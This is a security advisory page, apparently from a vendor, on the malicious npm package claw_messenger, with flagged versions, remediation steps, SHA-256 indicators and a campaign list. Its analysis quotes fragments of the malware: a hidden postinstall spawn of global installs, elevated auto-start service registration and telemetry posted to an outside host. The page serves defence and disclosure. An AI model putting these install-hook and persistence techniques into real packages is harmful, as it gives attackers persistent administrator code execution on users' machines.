Which versions of claw_messenger are malicious?

The following npm versions of claw_messenger are flagged malicious: 0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.83, 0.0.84, 0.0.89, 0.0.91, 0.0.94, 0.0.95. Treat any of these as compromised.

How do I remediate claw_messenger if I installed it?

Remove claw_messenger from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect claw_messenger in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking claw_messenger and packages like it before any post-install script runs.

Malicious package

claw_messengernpm

Malicious code in claw_messenger (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4526

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall claw_messenger

What this malware does

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install. (1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate. (2) An update-silent-service flow loads dist/service-installer.js which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag, then dist/daemon-manager.js elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec/sudo, on macOS via osascript... with administrator privileges. The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger. Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.

Malicious versions

12 flagged

0.0.760.0.770.0.780.0.790.0.800.0.810.0.830.0.840.0.890.0.910.0.940.0.95

Indicators of compromise (SHA-256)

0a6dd7846c1104187872b7c77c06c5af6ce6eebf5fbfca13a3197ca405f62110

15ae01d96f3589f6660b2aa5f459595c9346ab885eda35196dae6252775f986a

be1b00c981b646e9dc381b02454553daeb3c1d4c79e6389c4ff8bfabc1895692

6bc8d8ebe6a8a6597e5415dcacb635455a226dc6d415c0769b14f10fb6f6e82a

8718a8d94d27ecb38d0d0117d4c1aa9eb1d62a19ae38b8676b97c46f25a8a991

1598c6493986a4ac5a4b78244955ba89051d40c9d91a0b21499ffa940e918405

33d6e3445a3d7078cc5fb63b20119fde5529d19fc0f35b00bff26b3bccd8022b

43156e7ab347929d8e3bfdcb149a53fa2d15fa6ff5e1e0fe2fc5f605dffd06af

5188bb8e9c20ded8a6f408cbd2a007360ca12d05cc8594814d28f7c5c2c0900f

926845ae4e03999e8733488b89c25e4329f901792c59d3105827a7a9999333d4

933f35bc255c240e5caf3a9b438eb50cc7ca2e52893e24098280f93bfd155401

f8c98e6318b3e20e297eb42a3ee219f443fa79e82bbc8c5b6986f97a0d06ba50

05a3287b1a40ad0e755ebb780f8738d7a2edf831e5ec716620d61fc179e21c3b

4ebf4249af7ac3cdf473c8a51e652841c1582cdac92998e904ecf35e80ac2e57

6869fba05896ccbb1db6d0f86781a87f8e4ff0f690f952bfaaf3c412aa5f647e

72abcbac2b19fdbb8df1122850962b1d98fb484733d226f10890d6d8e5c97477

a947d3124d0b1babb942e0beb2cb12b9eff1f32f76063ab178dfaa0b3be43c08

ba8937a3dcb9003d86d8d0c45c0cefc2477884ed3d274e2df8c6a2db42401951

f8fa7b28caf0b8f50b34ec23b3fa3c6e73c8fb0c1154ff37a638f33c63b0e5fb

0885941bc4a25f1e6e9fa5f780621448b6af28241d783929c12e6fa32c6d40de

303aeac1ce95f9f8798e164c3de684452c93d668019840a3c47802bc71e4b5d0

4af5535475d2df9ace7290f2fe607f23e2d5b301ad4d3137b936f45015d77a90

afaa4f32cd58089cc5bd6bc7c686fe17549e2d535cc895433bb8a23287d8f7bc

b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f

Frequently asked questions

No. claw_messenger on npm has been identified as a malicious package (versions 0.0.76, 0.0.77, 0.0.78, 0.0.79, 0.0.80, 0.0.81, 0.0.83, 0.0.84, and 4 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003714IN-MAL-2026-003713IN-MAL-2026-006031IN-MAL-2026-006034IN-MAL-2026-006027IN-MAL-2026-006024IN-MAL-2026-006045IN-MAL-2026-006032IN-MAL-2026-006044IN-MAL-2026-006030IN-MAL-2026-006029IN-MAL-2026-006040IN-MAL-2026-006036IN-MAL-2026-006041IN-MAL-2026-006038IN-MAL-2026-006042IN-MAL-2026-006037IN-MAL-2026-006043IN-MAL-2026-006028IN-MAL-2026-006033IN-MAL-2026-006046IN-MAL-2026-006023IN-MAL-2026-006035IN-MAL-2026-006039

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection